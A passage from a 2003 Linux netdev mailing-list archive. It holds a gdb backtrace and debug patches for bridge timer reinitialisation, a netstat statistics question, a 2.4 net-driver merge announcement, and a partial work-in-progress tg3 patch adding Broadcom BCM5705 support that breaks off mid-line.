dev_change_flags (dev=0xf5d76004, flags=4163) at net/core/dev.c:2169 #7 0xc037366e in devinet_ioctl (cmd=35092, arg=0xbffff890) at net/ipv4/devinet.c:624 #8 0xc03763b7 in inet_ioctl (sock=0xf3645004, cmd=35092, arg=3221223568) at net/ipv4/af_inet.c:872 #9 0xc0330232 in sock_ioctl (inode=0xf4f6f030, file=0xf5b3b004, cmd=35092, arg=3221223568) at net/socket.c:830 #10 0xc017376f in sys_ioctl (fd=4, cmd=35092, arg=4109824004) at fs/ioctl.c:127 (gdb) c Continuing. ifup br0: Breakpoint 1, br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:175 175 br_timer_init(&p->message_age_timer, br_message_age_timer_expired, (gdb) bt #0 br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:175 #1 0xc03961dd in br_init_port (p=0xf3645004) at net/bridge/br_stp_if.c:37 #2 0xc03963e5 in br_stp_enable_port (p=0xf3645004) at net/bridge/br_stp_if.c:81 #3 0xc039627f in br_stp_enable_bridge (br=0xf370c240) at net/bridge/br_stp_if.c:51 #4 0xc0392af2 in br_dev_open (dev=0xf3645004) at net/bridge/br_device.c:90 #5 0xc03371e7 in dev_open (dev=0xf370c004) at net/core/dev.c:752 #6 0xc0338965 in dev_change_flags (dev=0xf370c004, flags=4163) at net/core/dev.c:2169 #7 0xc037366e in devinet_ioctl (cmd=35092, arg=0xbffff890) at net/ipv4/devinet.c:624 #8 0xc03763b7 in inet_ioctl (sock=0xf3645004, cmd=35092, arg=3221223568) at net/ipv4/af_inet.c:872 #9 0xc0330232 in sock_ioctl (inode=0xf35d6030, file=0xf35e4004, cmd=35092, arg=3221223568) at net/socket.c:830 #10 0xc017376f in sys_ioctl (fd=4, cmd=35092, arg=4082982916) at fs/ioctl.c:127 (gdb) c Continuing. Here the `ifup br0' hits my BUG() in br_timer_init(): Program received signal SIGTRAP, Trace/breakpoint trap. br_timer_init (timer=0xf3645040, _function=0xf3645040, _data=4083437632) at net/bridge/br_stp_timer.c:152 152 BUG(); (gdb) bt #0 br_timer_init (timer=0xf3645040, _function=0xf3645040, _data=4083437632) at net/bridge/br_stp_timer.c:152 #1 0xc0396ef0 in br_stp_port_timer_init (p=0xf3645004) at net/bridge/br_stp_timer.c:178 #2 0xc03961dd in br_init_port (p=0xf3645004) at net/bridge/br_stp_if.c:37 #3 0xc03963e5 in br_stp_enable_port (p=0xf3645004) at net/bridge/br_stp_if.c:81 #4 0xc039627f in br_stp_enable_bridge (br=0xf370c240) at net/bridge/br_stp_if.c:51 #5 0xc0392af2 in br_dev_open (dev=0xf3645040) at net/bridge/br_device.c:90 #6 0xc03371e7 in dev_open (dev=0xf370c004) at net/core/dev.c:752 #7 0xc0338965 in dev_change_flags (dev=0xf370c004, flags=4163) at net/core/dev.c:2169 #8 0xc037366e in devinet_ioctl (cmd=35092, arg=0xbffff890) at net/ipv4/devinet.c:624 #9 0xc03763b7 in inet_ioctl (sock=0xf3645040, cmd=35092, arg=3221223568) at net/ipv4/af_inet.c:872 #10 0xc0330232 in sock_ioctl (inode=0xf35d6030, file=0xf35e4004, cmd=35092, arg=3221223568) at net/socket.c:830 #11 0xc017376f in sys_ioctl (fd=4, cmd=35092, arg=4082982916) at fs/ioctl.c:127 See, we keep on reinitialising already-running timers over and over again. It is seriously broken. Here's the debug patch: kernel/timer.c | 4 ++++ net/bridge/br_stp_timer.c | 4 +++- 2 files changed, 7 insertions(+), 1 deletion(-) diff -puN kernel/timer.c~a kernel/timer.c --- 25/kernel/timer.c~a 2003-07-29 00:29:10.000000000 -0700 +++ 25-akpm/kernel/timer.c 2003-07-29 00:29:52.000000000 -0700 @@ -377,6 +377,10 @@ static int cascade(tvec_base_t *base, tv struct timer_list *tmp; tmp = list_entry(curr, struct timer_list, entry); + if (tmp->base != base) { + printk("%s: tmp->base=%p, base=%p\n", + __FUNCTION__, tmp->base, base); + } BUG_ON(tmp->base != base); curr = curr->next; internal_add_timer(base, tmp); diff -puN net/bridge/br_stp_timer.c~a net/bridge/br_stp_timer.c --- 25/net/bridge/br_stp_timer.c~a 2003-07-29 00:40:27.000000000 -0700 +++ 25-akpm/net/bridge/br_stp_timer.c 2003-07-29 00:41:11.000000000 -0700 @@ -144,10 +144,12 @@ static void br_hold_timer_expired(unsign spin_unlock_bh(&p->br->lock); } -static inline void br_timer_init(struct timer_list *timer, +static void br_timer_init(struct timer_list *timer, void (*_function)(unsigned long), unsigned long _data) { + if (timer->magic == TIMER_MAGIC && timer_pending(timer)) + BUG(); init_timer(timer); timer->function = _function; timer->data = _data; _ This patch partially reverts a change which Stephen made and randomly adds new stuff: net/bridge/br_if.c | 3 ++- net/bridge/br_notify.c | 6 ++++-- 2 files changed, 6 insertions(+), 3 deletions(-) diff -puN net/bridge/br_notify.c~bridge-fix net/bridge/br_notify.c --- 25/net/bridge/br_notify.c~bridge-fix 2003-07-29 01:23:29.000000000 -0700 +++ 25-akpm/net/bridge/br_notify.c 2003-07-29 01:23:35.000000000 -0700 @@ -47,11 +47,13 @@ static int br_device_event(struct notifi break; case NETDEV_DOWN: - br_stp_disable_port(p); + if (br->dev->flags & IFF_UP) + br_stp_disable_port(p); break; case NETDEV_UP: - br_stp_enable_port(p); + if (!(br->dev->flags & IFF_UP)) + br_stp_enable_port(p); break; case NETDEV_UNREGISTER: diff -puN net/bridge/br_if.c~bridge-fix net/bridge/br_if.c --- 25/net/bridge/br_if.c~bridge-fix 2003-07-29 01:28:07.000000000 -0700 +++ 25-akpm/net/bridge/br_if.c 2003-07-29 01:28:13.000000000 -0700 @@ -154,7 +154,8 @@ static struct net_bridge_port *new_nbp(s dev->br_port = p; p->port_no = i; - br_init_port(p); + if (!(br->dev->flags & IFF_UP)) + br_init_port(p); p->state = BR_STATE_DISABLED; list_add_rcu(&p->list, &br->port_list); _ but it is hopelessly inadequate. From billd@cait.wustl.edu Tue Jul 29 05:51:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 05:52:06 -0700 (PDT) Received: from kronos.wustl.edu (kronos.cait.wustl.edu [128.252.53.11]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6TCpvFl023577 for ; Tue, 29 Jul 2003 05:51:58 -0700 Received: by kronos.cait.wustl.edu with Internet Mail Service (5.5.2653.19) id ; Tue, 29 Jul 2003 08:07:29 -0500 Message-ID: From: Bill Darte To: "'netdev@oss.sgi.com'" Subject: Re: TCPPureAcks TCPHPAcks - Definition? Date: Tue, 29 Jul 2003 08:07:27 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" X-archive-position: 4364 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: billd@cait.wustl.edu Precedence: bulk X-list: netdev Please help by identifying an archive or any other reference where I can find explanations of all the networking statistics produced by netstat -s on the linux os. Thanks so much and apologies if this is redundant. Bill Darte CAIT Senior Technical Associate billd@cait.wustl.edu 314 935-7575 From garzik@gtf.org Tue Jul 29 09:24:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 09:24:17 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6TGO7Fl023652 for ; Tue, 29 Jul 2003 09:24:08 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id 47C496642; Tue, 29 Jul 2003 12:24:01 -0400 (EDT) Date: Tue, 29 Jul 2003 12:24:01 -0400 From: Jeff Garzik To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: [BK PATCHES] 2.4.x net driver merges Message-ID: <20030729162401.GB1920@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4365 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev BK users, pull from bk pull bk://gkernel.bkbits.net/net-drivers-2.4 Others may download the patch from ftp://ftp.kernel.org/pub/linux/kernel/people/jgarzik/patchkits/2.4/2.4.22-pre8-netdrvr1.patch.bz2 This will update the following files: Documentation/Configure.help | 12 Documentation/networking/ifenslave.c | 90 + drivers/net/Config.in | 1 drivers/net/Makefile | 1 drivers/net/b44.c | 1881 +++++++++++++++++++++++++++++++++++ drivers/net/b44.h | 543 ++++++++++ drivers/net/wireless/airo.c | 767 ++++++++------ 7 files changed, 2962 insertions(+), 333 deletions(-) through these ChangeSets: (03/07/29 1.1039) [netdrvr] add new broadcom 440x net driver, "b44" By David Miller, with many fixes from Pekka Pietikainen. (03/07/29 1.1038) [wireless airo] adds support for noise level reporting (if available) (03/07/29 1.1037) [wireless airo] makes the card passive when entering monitor mode (03/07/29 1.1036) [wireless airo] eliminate infinite loop makes sure a possible (never happened, but just in case) infinite loop in the transmission code terminates. (03/07/29 1.1035) [wireless airo] safer shutdown sequence changes the card shutdown sequence to a safer one (03/07/29 1.1034) [wireless airo] fix Tx race (03/07/19 1.1032) [bonding] fix ifenslave ABI bug (03/07/19 1.1031) [wireless airo] Update to wireless extensions 16 (new spy API). (03/07/19 1.1030) [wireless airo] Update to wireless extensions 15 (add monitor mode). (03/07/19 1.1029) [wireless airo] Return channel in infrastructure mode. (03/07/19 1.1028) [wireless airo] Checks for small packets before transmitting them. (03/07/19 1.1027) [wireless airo] Returns proper status in case of transmission error. (03/07/19 1.1026) [wireless airo] Fix small endianness bug. (03/07/19 1.1025) [wireless airo] Don't call MIC functions if the card doesn't support them. (03/07/19 1.1024) [wireless airo] Don't sleep when the stats are requested. (03/07/19 1.1023) [wireless airo] Make locking "per thread" so it's fully preemptive. (03/07/19 1.1022) [wireless airo] Update structs with the new fields in latest firmwares. (03/07/19 1.1021) [wireless airo] Simplify dynamic buffer code in Cisco extensions. (03/07/19 1.1020) [wireless airo] sync with 2.6 Trivialities: spelling, stack usage, checking return vals, etc. From garzik@gtf.org Tue Jul 29 10:10:03 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 29 Jul 2003 10:10:11 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6THA0Fl028735 for ; Tue, 29 Jul 2003 10:10:02 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id C14A36642; Tue, 29 Jul 2003 13:09:54 -0400 (EDT) Date: Tue, 29 Jul 2003 13:09:54 -0400 From: Jeff Garzik To: linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: PATCH: bcm5705 support -- buggy Message-ID: <20030729170954.GA16370@gtf.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.28i X-archive-position: 4366 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev There are a lot of requests for Broadcom BCM5705/5782 support. Here is the current patch for it... it's not as simple as adding the PCI ids, as some have speculated. Note that this patch does not work fully yet (otherwise it would have been sent to Marcelo/Linus long before now). I should have it fully debugged before September rolls around, but here's the pre-release if hackers want to play. diff -Nru a/drivers/net/tg3.c b/drivers/net/tg3.c --- a/drivers/net/tg3.c Tue Jul 29 13:08:22 2003 +++ b/drivers/net/tg3.c Tue Jul 29 13:08:22 2003 @@ -69,7 +69,8 @@ /* hardware minimum and maximum for a single frame's data payload */ #define TG3_MIN_MTU 60 -#define TG3_MAX_MTU 9000 +#define TG3_MAX_MTU(tp) \ + (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705 ? 9000 : 1500) /* These numbers seem to be hard coded in the NIC firmware somehow. * You can't change the ring sizes, but you can change where you place @@ -79,7 +80,17 @@ #define TG3_DEF_RX_RING_PENDING 200 #define TG3_RX_JUMBO_RING_SIZE 256 #define TG3_DEF_RX_JUMBO_RING_PENDING 100 -#define TG3_RX_RCB_RING_SIZE 1024 + +/* Do not place this n-ring entries value into the tp struct itself, + * we really want to expose these constants to GCC so that modulo et + * al. operations are done with shifts and masks instead of with + * hw multiply/modulo instructions. Another solution would be to + * replace things like '% foo' with '& (foo - 1)'. + */ +#define TG3_RX_RCB_RING_SIZE(tp) \ + (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705 ? \ + 512 : 1024) + #define TG3_TX_RING_SIZE 512 #define TG3_DEF_TX_RING_PENDING (TG3_TX_RING_SIZE - 1) @@ -87,8 +98,8 @@ TG3_RX_RING_SIZE) #define TG3_RX_JUMBO_RING_BYTES (sizeof(struct tg3_rx_buffer_desc) * \ TG3_RX_JUMBO_RING_SIZE) -#define TG3_RX_RCB_RING_BYTES (sizeof(struct tg3_rx_buffer_desc) * \ - TG3_RX_RCB_RING_SIZE) +#define TG3_RX_RCB_RING_BYTES(tp) (sizeof(struct tg3_rx_buffer_desc) * \ + TG3_RX_RCB_RING_SIZE(tp)) #define TG3_TX_RING_BYTES (sizeof(struct tg3_tx_buffer_desc) * \ TG3_TX_RING_SIZE) #define TX_RING_GAP(TP) \ @@ -129,6 +140,10 @@ PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0UL }, { PCI_VENDOR_ID_BROADCOM, PCI_DEVICE_ID_TIGON3_5702FE, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0UL }, + { PCI_VENDOR_ID_BROADCOM, PCI_DEVICE_ID_TIGON3_5705, + PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0UL }, + { PCI_VENDOR_ID_BROADCOM, PCI_DEVICE_ID_TIGON3_5705M, + PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0UL }, { PCI_VENDOR_ID_BROADCOM, PCI_DEVICE_ID_TIGON3_5702X, PCI_ANY_ID, PCI_ANY_ID, 0, 0, 0UL }, { PCI_VENDOR_ID_BROADCOM, PCI_DEVICE_ID_TIGON3_5703X, @@ -274,17 +289,28 @@ static void tg3_switch_clocks(struct tg3 *tp) { - if (tr32(TG3PCI_CLOCK_CTRL) & CLOCK_CTRL_44MHZ_CORE) { + u32 clock_ctrl = tr32(TG3PCI_CLOCK_CTRL); + u32 orig_clock_ctrl; + + orig_clock_ctrl = clock_ctrl; + clock_ctrl &= (CLOCK_CTRL_FORCE_CLKRUN | + CLOCK_CTRL_CLKRUN_OENABLE | + 0x1f); + tp->pci_clock_ctrl = clock_ctrl; + + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705 && + (orig_clock_ctrl & CLOCK_CTRL_44MHZ_CORE) != 0) { tw32(TG3PCI_CLOCK_CTRL, + clock_ctrl | (CLOCK_CTRL_44MHZ_CORE | CLOCK_CTRL_ALTCLK)); tr32(TG3PCI_CLOCK_CTRL); udelay(40); tw32(TG3PCI_CLOCK_CTRL, - (CLOCK_CTRL_ALTCLK)); + clock_ctrl | (CLOCK_CTRL_ALTCLK)); tr32(TG3PCI_CLOCK_CTRL); udelay(40); } - tw32(TG3PCI_CLOCK_CTRL, 0); + tw32(TG3PCI_CLOCK_CTRL, clock_ctrl); tr32(TG3PCI_CLOCK_CTRL); udelay(40); } @@ -387,6 +413,18 @@ return ret; } +static void tg3_phy_set_wirespeed(struct tg3 *tp) +{ + u32 val; + + if (tp->tg3_flags2 & TG3_FLG2_NO_ETH_WIRE_SPEED) + return; + + tg3_writephy(tp, MII_TG3_AUX_CTRL, 0x7007); + tg3_readphy(tp, MII_TG3_AUX_CTRL, &val); + tg3_writephy(tp, MII_TG3_AUX_CTRL, (val | (1 << 15) | (1 << 4))); +} + /* This will reset the tigon3 PHY if there is no valid * link unless the FORCE argument is non-zero. */ @@ -422,12 +460,102 @@ if ((phy_control & BMCR_RESET) == 0) { udelay(40); - return 0; + goto out; } udelay(10); } return -EBUSY; + +out: + tg3_phy_set_wirespeed(tp); + return 0; +} + +static void tg3_frob_aux_power(struct tg3 *tp) +{ + struct tg3 *tp_peer = tp; + + if ((tp->tg3_flags & TG3_FLAG_EEPROM_WRITE_PROT) != 0) + return; + + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) { + tp_peer = pci_get_drvdata(tp->pdev_peer); + if (!tp_peer) + BUG(); + } + + + if ((tp->tg3_flags & TG3_FLAG_WOL_ENABLE) != 0 || + (tp_peer->tg3_flags & TG3_FLAG_WOL_ENABLE) != 0) { + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701) { + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE0 | + GRC_LCLCTRL_GPIO_OE1 | + GRC_LCLCTRL_GPIO_OE2 | + GRC_LCLCTRL_GPIO_OUTPUT0 | + GRC_LCLCTRL_GPIO_OUTPUT1)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + } else { + if (tp_peer != tp && + (tp_peer->tg3_flags & TG3_FLAG_INIT_COMPLETE) != 0) + return; + + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE0 | + GRC_LCLCTRL_GPIO_OE1 | + GRC_LCLCTRL_GPIO_OE2 | + GRC_LCLCTRL_GPIO_OUTPUT1 | + GRC_LCLCTRL_GPIO_OUTPUT2)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE0 | + GRC_LCLCTRL_GPIO_OE1 | + GRC_LCLCTRL_GPIO_OE2 | + GRC_LCLCTRL_GPIO_OUTPUT0 | + GRC_LCLCTRL_GPIO_OUTPUT1 | + GRC_LCLCTRL_GPIO_OUTPUT2)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE0 | + GRC_LCLCTRL_GPIO_OE1 | + GRC_LCLCTRL_GPIO_OE2 | + GRC_LCLCTRL_GPIO_OUTPUT0 | + GRC_LCLCTRL_GPIO_OUTPUT1)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + } + } else { + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5700 && + GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5701) { + if (tp_peer != tp && + (tp_peer->tg3_flags & TG3_FLAG_INIT_COMPLETE) != 0) + return; + + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE1 | + GRC_LCLCTRL_GPIO_OUTPUT1)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE1)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + + tw32(GRC_LOCAL_CTRL, tp->grc_local_ctrl | + (GRC_LCLCTRL_GPIO_OE1 | + GRC_LCLCTRL_GPIO_OUTPUT1)); + tr32(GRC_LOCAL_CTRL); + udelay(100); + } + } } static int tg3_setup_phy(struct tg3 *); @@ -533,89 +661,65 @@ udelay(10); } - if (tp->tg3_flags & TG3_FLAG_WOL_SPEED_100MB) { + if (!(tp->tg3_flags & TG3_FLAG_WOL_SPEED_100MB) && + (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701)) { u32 base_val; - base_val = 0; - if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || - GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701) - base_val |= (CLOCK_CTRL_RXCLK_DISABLE | - CLOCK_CTRL_TXCLK_DISABLE); - - tw32(TG3PCI_CLOCK_CTRL, base_val | - CLOCK_CTRL_ALTCLK); - tr32(TG3PCI_CLOCK_CTRL); - udelay(40); + base_val = tp->pci_clock_ctrl; + base_val |= (CLOCK_CTRL_RXCLK_DISABLE | + CLOCK_CTRL_TXCLK_DISABLE); tw32(TG3PCI_CLOCK_CTRL, base_val | CLOCK_CTRL_ALTCLK | - CLOCK_CTRL_44MHZ_CORE); - tr32(TG3PCI_CLOCK_CTRL); - udelay(40); - - tw32(TG3PCI_CLOCK_CTRL, base_val | - CLOCK_CTRL_44MHZ_CORE); + CLOCK_CTRL_PWRDOWN_PLL133); tr32(TG3PCI_CLOCK_CTRL); udelay(40); } else { - u32 base_val; + u32 newbits1, newbits2; - base_val = 0; if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || - GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701) - base_val |= (CLOCK_CTRL_RXCLK_DISABLE | - CLOCK_CTRL_TXCLK_DISABLE); + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701) { + newbits1 = (CLOCK_CTRL_RXCLK_DISABLE | + CLOCK_CTRL_TXCLK_DISABLE | + CLOCK_CTRL_ALTCLK); + newbits2 = newbits1 | CLOCK_CTRL_44MHZ_CORE; + } else if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + newbits1 = CLOCK_CTRL_625_CORE; + newbits2 = newbits1 | CLOCK_CTRL_ALTCLK; + } else { + newbits1 = CLOCK_CTRL_ALTCLK; + newbits2 = newbits1 | CLOCK_CTRL_44MHZ_CORE; + } - tw32(TG3PCI_CLOCK_CTRL, base_val | - CLOCK_CTRL_ALTCLK | - CLOCK_CTRL_PWRDOWN_PLL133); + tw32(TG3PCI_CLOCK_CTRL, tp->pci_clock_ctrl | newbits1); tr32(TG3PCI_CLOCK_CTRL); udelay(40); - } - if (!(tp->tg3_flags & TG3_FLAG_EEPROM_WRITE_PROT) && - (tp->tg3_flags & TG3_FLAG_WOL_ENABLE)) { - if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || - GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701) { - tw32(GRC_LOCAL_CTRL, - (GRC_LCLCTRL_GPIO_OE0 | - GRC_LCLCTRL_GPIO_OE1 | - GRC_LCLCTRL_GPIO_OE2 | - GRC_LCLCTRL_GPIO_OUTPUT0 | - GRC_LCLCTRL_GPIO_OUTPUT1)); - tr32(GRC_LOCAL_CTRL); - udelay(100); - } else { - tw32(GRC_LOCAL_CTRL, - (GRC_LCLCTRL_GPIO_OE0 | - GRC_LCLCTRL_GPIO_OE1 | - GRC_LCLCTRL_GPIO_OE2 | - GRC_LCLCTRL_GPIO_OUTPUT1 | - GRC_LCLCTRL_GPIO_OUTPUT2)); - tr32(GRC_LOCAL_CTRL); - udelay(100); + tw32(TG3PCI_CLOCK_CTRL, tp->pci_clock_ctrl | newbits2); + tr32(TG3PCI_CLOCK_CTRL); + udelay(40); - tw32(GRC_LOCAL_CTRL, - (GRC_LCLCTRL_GPIO_OE0 | - GRC_LCLCTRL_GPIO_OE1 | - GRC_LCLCTRL_GPIO_OE2 | - GRC_LCLCTRL_GPIO_OUTPUT0 | - GRC_LCLCTRL_GPIO_OUTPUT1 | - GRC_LCLCTRL_GPIO_OUTPUT2)); - tr32(GRC_LOCAL_CTRL); - udelay(100); + if (GET_ASIC_REV(tp->pci_chip_rev_id) != ASIC_REV_5705) { + u32 newbits3; - tw32(GRC_LOCAL_CTRL, - (GRC_LCLCTRL_GPIO_OE0 | - GRC_LCLCTRL_GPIO_OE1 | - GRC_LCLCTRL_GPIO_OE2 | - GRC_LCLCTRL_GPIO_OUTPUT0 | - GRC_LCLCTRL_GPIO_OUTPUT1)); - tr32(GRC_LOCAL_CTRL); - udelay(100); + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5700 || + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5701) { + newbits3 = (CLOCK_CTRL_RXCLK_DISABLE | + CLOCK_CTRL_TXCLK_DISABLE | + CLOCK_CTRL_44MHZ_CORE); + } else { + newbits3 = CLOCK_CTRL_44MHZ_CORE; + } + + tw32(TG3PCI_CLOCK_CTRL, tp->pci_clock_ctrl | newbits3); + tr32(TG3PCI_CLOCK_CTRL); + udelay(40); } } + tg3_frob_aux_power(tp); + /* Finally, set the new power state. */ pci_write_config_word(tp->pdev, pm + PCI_PM_CTRL, power_control); @@ -934,11 +1038,10 @@ /* Some third-party PHYs need to be reset on link going * down. - * - * XXX 5705 note: This workaround also applies to 5705_a0 */ if ((GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5703 || - GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704) && + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5704 || + tp->pci_chip_rev_id == CHIPREV_ID_5705_A0) && netif_carrier_ok(tp->dev)) { tg3_readphy(tp, MII_BMSR, &bmsr); tg3_readphy(tp, MII_BMSR, &bmsr); @@ -1928,7 +2031,7 @@ int received; hw_idx = tp->hw_status->idx[0].rx_producer; - sw_idx = rx_rcb_ptr % TG3_RX_RCB_RING_SIZE; + sw_idx = rx_rcb_ptr % TG3_RX_RCB_RING_SIZE(tp); work_mask = 0; received = 0; while (sw_idx != hw_idx && budget > 0) { @@ -2029,13 +2132,13 @@ (*post_ptr)++; next_pkt_nopost: rx_rcb_ptr++; - sw_idx = rx_rcb_ptr % TG3_RX_RCB_RING_SIZE; + sw_idx = rx_rcb_ptr % TG3_RX_RCB_RING_SIZE(tp); } /* ACK the status ring. */ tp->rx_rcb_ptr = rx_rcb_ptr; tw32_mailbox(MAILBOX_RCVRET_CON_IDX_0 + TG3_64BIT_REG_LOW, - (rx_rcb_ptr % TG3_RX_RCB_RING_SIZE)); + (rx_rcb_ptr % TG3_RX_RCB_RING_SIZE(tp))); if (tp->tg3_flags & TG3_FLAG_MBOX_WRITE_REORDER) tr32(MAILBOX_RCVRET_CON_IDX_0 + TG3_64BIT_REG_LOW); @@ -2655,7 +2758,7 @@ { struct tg3 *tp = dev->priv; - if (new_mtu < TG3_MIN_MTU || new_mtu > TG3_MAX_MTU) + if (new_mtu < TG3_MIN_MTU || new_mtu > TG3_MAX_MTU(tp)) return -EINVAL; if (!netif_running(dev)) { @@ -2774,7 +2877,7 @@ /* Zero out all descriptors. */ memset(tp->rx_std, 0, TG3_RX_RING_BYTES); memset(tp->rx_jumbo, 0, TG3_RX_JUMBO_RING_BYTES); - memset(tp->rx_rcb, 0, TG3_RX_RCB_RING_BYTES); + memset(tp->rx_rcb, 0, TG3_RX_RCB_RING_BYTES(tp)); if (tp->tg3_flags & TG3_FLAG_HOST_TXDS) { memset(tp->tx_ring, 0, TG3_TX_RING_BYTES); @@ -2857,7 +2960,7 @@ tp->rx_jumbo = NULL; } if (tp->rx_rcb) { - pci_free_consistent(tp->pdev, TG3_RX_RCB_RING_BYTES, + pci_free_consistent(tp->pdev, TG3_RX_RCB_RING_BYTES(tp), tp->rx_rcb, tp->rx_rcb_mapping); tp->rx_rcb = NULL; } @@ -2915,7 +3018,7 @@ if (!tp->rx_jumbo) goto err_out; - tp->rx_rcb = pci_alloc_consistent(tp->pdev, TG3_RX_RCB_RING_BYTES, + tp->rx_rcb = pci_alloc_consistent(tp->pdev, TG3_RX_RCB_RING_BYTES(tp), &tp->rx_rcb_mapping); if (!tp->rx_rcb) goto err_out; @@ -2962,6 +3065,23 @@ unsigned int i; u32 val; + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + switch (ofs) { + case RCVLSC_MODE: + case DMAC_MODE: + case MBFREE_MODE: + case BUFMGR_MODE: + case MEMARB_MODE: + /* We can't enable/disable these bits of the + * 5705, just say success. + */ + return 0; + + default: + break; + }; + } + val = tr32(ofs); val &= ~enable_bit; tw32(ofs, val); @@ -3083,7 +3203,10 @@ tp->tg3_flags &= ~TG3_FLAG_5701_REG_WRITE_BUG; /* do the reset */ - tw32(GRC_MISC_CFG, GRC_MISC_CFG_CORECLK_RESET); + val = GRC_MISC_CFG_CORECLK_RESET; + if (GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + val |= GRC_MISC_CFG_KEEP_GPHY_POWER; + tw32(GRC_MISC_CFG, val); /* restore 5701 hardware bug workaround flag */ tp->tg3_flags = flags_save; @@ -3119,6 +3242,13 @@ tw32(MEMARB_MODE, MEMARB_MODE_ENABLE); + if ((tp->nic_sram_data_cfg & NIC_SRAM_DATA_CFG_MINI_PCI) != 0 && + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + tp->pci_clock_ctrl |= + (CLOCK_CTRL_FORCE_CLKRUN | CLOCK_CTRL_CLKRUN_OENABLE); + tw32(TG3PCI_CLOCK_CTRL, tp->pci_clock_ctrl); + } + tw32(TG3PCI_MISC_HOST_CTRL, tp->misc_host_ctrl); } @@ -3317,6 +3447,10 @@ { int i; + if (offset == TX_CPU_BASE && + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) + BUG(); + tw32(offset + CPU_STATE, 0xffffffff); tw32(offset + CPU_MODE, CPU_MODE_RESET); if (offset == RX_CPU_BASE) { @@ -3367,6 +3501,14 @@ int err, i; u32 orig_tg3_flags = tp->tg3_flags; + if (cpu_base == TX_CPU_BASE && + GET_ASIC_REV(tp->pci_chip_rev_id) == ASIC_REV_5705) { + printk(KERN_ERR PFX "tg3_load_firmware_cpu: Trying to load " + "TX cpu firmware on %s which is 5705.\n", + tp->dev->name); + return -EINVAL; + } + /* Force use of PCI config space for 